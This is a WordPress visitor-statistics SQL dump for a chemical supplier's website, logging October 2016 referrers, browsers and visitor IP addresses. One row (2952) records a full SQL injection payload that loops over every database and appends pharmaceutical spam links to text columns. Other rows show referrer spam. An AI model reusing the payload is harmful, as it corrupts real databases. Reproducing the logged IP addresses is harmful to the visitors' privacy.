INSERT INTO `wp_statistics_visitor` VALUES (2854, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwiNk-jNu9PPAhWEXR4KHV7-BzAQFgg8MAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resin-systems%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNG6RGElFSs08M_XIzUqwvJDjHrVSw', 'MSIE', 'Windows', '11.0', '', '151.207.250.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2855, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/', 'Chrome', 'Android', '53.0.2785.124', '', '172.32.101.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2856, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '107.77.72.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2857, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '40.132.182.194', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2858, '2016-10-11', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2859, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2860, '2016-10-11', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.10240', '', '98.143.243.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2861, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.91.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2862, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '167.161.101.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2863, '2016-10-11', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=98&print=y', 'MSIE', 'Windows', '9.0', '', '182.118.21.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2864, '2016-10-11', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=98&print=y', 'MSIE', 'Windows', '9.0', '', '182.118.21.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2865, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '162.58.82.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2866, '2016-10-11', 'https://www.directindustry.com/prod/miller-stephenson-chemical-co-173822.html', 'Firefox', 'Windows', '49.0', '', '176.37.75.76', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2867, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.160.200.35', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2868, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '137.78.4.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2869, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2870, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '12.199.138.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2871, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '75.133.107.185', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2872, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '41.0.2272.89', '', '10.74.135.201', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2873, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '172.248.107.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2874, '2016-10-11', 'https://www.google.com.sa/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '77.31.198.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2875, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '206.169.136.240', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2876, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'Safari', 'iPhone', '10.0', '', '206.169.136.241', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2877, '2016-10-11', 'https://mschem.com/miller/js/\\\\\\\'+api.getField(\\\\\\\'image\\\\\\\')+\\\\\\\'', 'MSIE', 'Windows', '6.0', '', '65.208.151.113', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2878, '2016-10-11', 'https://mschem.com/miller/js/\\\\\\\'+api.getField(\\\\\\\'image\\\\\\\')+\\\\\\\'', 'MSIE', 'Windows', '6.0', '', '65.208.151.112', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2879, '2016-10-11', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.119', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2880, '2016-10-11', 'https://www.bing.com/search?q=1001f&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2881, '2016-10-11', 'https://www.miller-stephenson.com/product/epon-1001f/', 'MSIE', 'Windows', '9.0', '', '204.79.180.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2882, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.165.167.19', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2883, '2016-10-11', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.115', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2884, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2885, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2886, '2016-10-11', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.114', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2887, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.7.224.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2888, '2016-10-11', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '17.0', '', '118.160.75.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2889, '2016-10-11', 'https://www.google.co.nz/', 'Firefox', 'Windows', '49.0', '', '202.50.239.46', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2890, '2016-10-11', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '63.149.67.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2891, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '63.149.69.113', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2892, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '48.0', '', '130.199.3.165', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2893, '2016-10-11', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.133.79.5', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2894, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDAQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=flH9V4zXDcWt_AaZjQE&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'MSIE', 'Windows', '11.0', '', '66.249.88.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2895, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '68.118.194.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2896, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '209.133.79.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2897, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/xht-bd-series/', 'Chrome', 'Windows', '53.0.2785.143', '', '186.220.13.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2898, '2016-10-11', 'https://www.bing.com/search?q=krytox+ts4&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '199.107.68.203', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2899, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.203', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2900, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '5.61.27.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2901, '2016-10-11', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.117', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2902, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2903, '2016-10-11', 'https://www.miller-stephenson.com', 'Wget', 'Unknown', '1.11.4', '', '173.242.118.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2904, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '108.54.227.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2905, '2016-10-11', 'https://www.asseenontvonline.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2906, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.140.139.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2907, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.161.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2908, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '64.73.228.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2909, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '159.253.0.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2910, '2016-10-11', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.118', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2911, '2016-10-11', 'https://www.google.co.nz/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.97.179.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2912, '2016-10-11', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.116', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2913, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi-gL3-2dPPAhUCwiYKHZ8CBIwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNHUfibmnSo5DfkuTd-5Mx9sov-a1Q&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '143.166.226.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2914, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '187.17.106.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2915, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '104.174.225.136', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2916, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2917, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '74.85.167.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2918, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.169.3.46', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2919, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '76.98.210.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2920, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2921, '2016-10-11', 'https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCAQFjAF&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=fWT9V4XpKY_YwwTHfw&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'Safari', 'iPhone', '9.0', '', '66.249.88.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2922, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.61.218.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2923, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi29c2O5tPPAhVKLyYKHcapCYMQFggjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=ZFVnCV3Fvi6BuhNN9xNKuw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '205.115.189.114', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2924, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '24.37.77.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2925, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2926, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2927, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.101.136.224', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2928, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2929, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwizw5bJ6tPPAhUF4CYKHf-KDCkQFgg6MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w&sig2=8Cyi35VT5W2PQzwydwRM4A&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '11.0', '', '138.163.0.41', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2930, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '11.0', '', '138.163.0.42', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2931, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '96.42.244.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2932, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.55.193.103', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2933, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '99.119.208.255', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2934, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '50.96.233.8', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2935, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '105.112.17.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2936, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '173.241.184.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2937, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiQh7e88dPPAhXEX34KHQZBAb0YABAA&sig=AOD64_15855avHOSdxtSkyVGjYq4pQ5MlQ&rct=j&q=&ved=0ahUKEwjCnbS88dPPAhUE4WMKHcwaCd8Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '38.96.47.180', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2938, '2016-10-11', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.193.212.151', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2939, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '75.112.233.43', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2940, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwitlrnw9dPPAhUBbSYKHa-VCfAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '65.249.12.2', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2941, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '65.249.12.2', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2942, '2016-10-11', 'https://www.miller-stephenson.com/epoxy/', 'MSIE', 'Windows', '9.0', '', '182.118.20.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2943, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2944, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.114', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2945, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.112', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2946, '2016-10-12', 'https://www.miller-stephenson.com/wp-admin/post.php?post=427&action=edit', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1675, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2947, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.119', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2948, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.118', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2949, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.117', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2950, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.116', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2951, '2016-10-12', 'https://www.miller-stephenson.com/feed/', 'MSIE', 'Windows', '6.0', '', '65.208.151.115', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2952, '2016-10-12', 'https://google.com\\\\\\\';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in (\\\\\\\'master\\\\\\\',\\\\\\\'tempdb\\\\\\\',\\\\\\\'model\\\\\\\',\\\\\\\'msdb\\\\\\\',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s=\\\\\\\'begin try use [\\\\\\\'+@w+\\\\\\\'];declare @c cursor;declare @d varchar(4000);set @c=cursor for select \\\\\\\'\\\\\\\'update [\\\\\\\'\\\\\\\'+TABLE_NAME+\\\\\\\'\\\\\\\'] set [\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']=[\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']+case ABS(CHECKSUM(NewId()))%9 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'medical abortion pill \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'+case ABS(CHECKSUM(NewId()))%3 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'open\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' when 1 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'link\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'funtimeleisure.co.uk\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end +\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' other options besides abortion\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end\\\\\\\'\\\\\\\' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like \\\\\\\'\\\\\\\'%varchar\\\\\\\'\\\\\\\' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch\\\\\\\';exec (@s);fetch next from @b into @w;end;close @b--', 'Firefox', 'Windows', '24.0', '', '72.167.131.75', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2953, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '75.101.183.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2954, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.0.10', '', '54.87.7.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2955, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2956, '2016-10-12', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2957, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2958, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.36.156.26', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2959, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2960, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2961, '2016-10-12', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '138.229.16.252', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2962, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '39.0.2171.71', '', '129.7.106.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2963, '2016-10-12', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '65.208.151.113', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2964, '2016-10-12', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiVkvq1idTPAhVLVj4KHfqtCCwQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=W9lrADnrU0Na77AkpKsMrA&bvm=bv.135475266,d.dmo', 'MSIE', 'Windows', '11.0', '', '200.38.28.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2965, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2966, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2967, '2016-10-12', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '67.189.220.246', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2968, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.3.101', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2969, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Linux', '49.0', '', '38.92.154.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2970, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '76.20.236.52', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2971, '2016-10-12', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2972, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '206.130.125.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2973, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.209.47.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2974, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '175.10.100.28', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2975, '2016-10-12', 'https://www.bioscorp.ru/', 'Opera', 'Windows', '7.11', '', '37.115.187.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2976, '2016-10-12', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '17.0', '', '104.168.85.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2977, '2016-10-12', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.168.85.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2978, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '18.189.59.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2979, '2016-10-12', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '110.55.3.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2980, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '16.0.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2981, '2016-10-12', 'https://mmk.mschem.com/', 'Opera', 'Windows', '12.16', '', '119.128.173.54', '000', 33, 0); 
